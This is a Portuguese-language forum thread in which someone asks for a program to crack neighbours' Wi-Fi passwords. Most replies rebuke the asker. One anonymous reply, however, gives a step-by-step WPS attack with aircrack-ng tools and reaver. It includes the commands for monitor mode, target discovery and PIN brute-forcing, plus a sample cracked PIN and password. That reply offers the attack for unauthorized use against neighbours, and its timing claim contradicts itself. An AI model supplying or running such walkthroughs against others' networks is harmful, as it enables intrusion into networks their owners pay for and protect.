8.82K  26/11/2019 10h59

Quero acessar internet usada usando wi-fi, mas os vizinhos colocaram senhas de sacanagem, e eu não quero acessar usando a internet de chip de operadora porque é ruim e cara. Vocês sabem de algum programa pra descobrir senhas?

eles perguntam
4 5
elas respondem
07/07/2016 18h54
"Colocaram senhas de sacanagem"... Se toca!
Que tal vc se prontificar a dividir o pagamento da conta do provedor de internet já que vc quer usar algo que não te pertence??
07/07/2016 22h07
Quem tá de sacanagem é tu, esse jeitinho brasileiro.
Você pode dividir a conta, se coloca no lugar deles, a pessoa paga todo mês e vem um e usa a internet podendo diminuir a velocidade....

Fique com Deus então conversa com ele e lembra -se todas as coisas me são lícitas, mas nem todas me convém
anônima
26/11/2019 10h59
Toma vergonha na sua cara, contrate um pacote de internet. Seu folgado!
anônima
08/07/2016 02h24
Colocar senha no wifi que a própria pessoa paga e usufrui é sacanagem agora? Kkkk
Tomara que vc nunca consiga a senha.
eles respondem
anônimo
07/07/2016 18h50
a forma mais eficaz de conseguir a senha é... perguntando para o dono da rede!
anônimo
07/07/2016 22h45
"Colocaram senhas de sacanagem" kkkkkkkkkkkk E vc não ta de sacanagem querendo roubar senhas dos outros, né?
Contratar e pagar um serviço de internet fixa e instalar um ponto wi fi e deixar aberta para os outros usarem, você não faz, né? Dividir a conta com alguém idem, tampouco!?
07/07/2016 23h15
É por isso que eu costumo colocar senhas complicadas e trocar a senha com frequência do meu roteador.
anônimo
07/07/2016 18h57
Instale a OS Linux e execute os seguintes comandos:
Utilizei o Ubuntu 13.10.
Preparando o ataque:
Colocar a placa de rede Wi-Fi em modo monitor com o Aircrack-ng.
Identificar o alvo (capturar o BSSID do router alvo, utilizando também o Aircrack-ng).
Atacar (Reaver).

Para isso, seguir os passos abaixo:

Encontre o sua interface Wi-Fi:

iwconfig

Você verá o nome da interface de rede sem fio, por exemplo wlan0.

Coloque sua placa Wireless em modo monitor:

sudo airmon-ng start wlan0

Monitor mode enabled on → que muito provavelmente será mon0.

Encontre o BSSID do roteador que você quer crackear:

sudo airodump-ng mon0

BSSID é o MAC address do roteador.
A rede deve ter WPA ou WPA2 listado na coluna ENC.

Ataque:

sudo reaver -i mon0 -b 00:00:00:00:00:00 -vv

Onde:
-i :: interface
-b :: BSSID (substituir o "00:00:00:00:00:00" pelo alvo)
-vv :: verbose (mostrar mensagens)
No meu caso, a senha foi quebrada em apenas 10min:

Pin cracked in 7302 seconds
WPS PIN: '10179178' (pin code do roteador)
WPA PSK: '79ri7gse6.c' (senha revelada!)
AP SSID: GENTIL

FÁCIL DEMAIS. NÃO?
08/07/2016 05h48
Também não entendi essa de fizeram de sacanagem.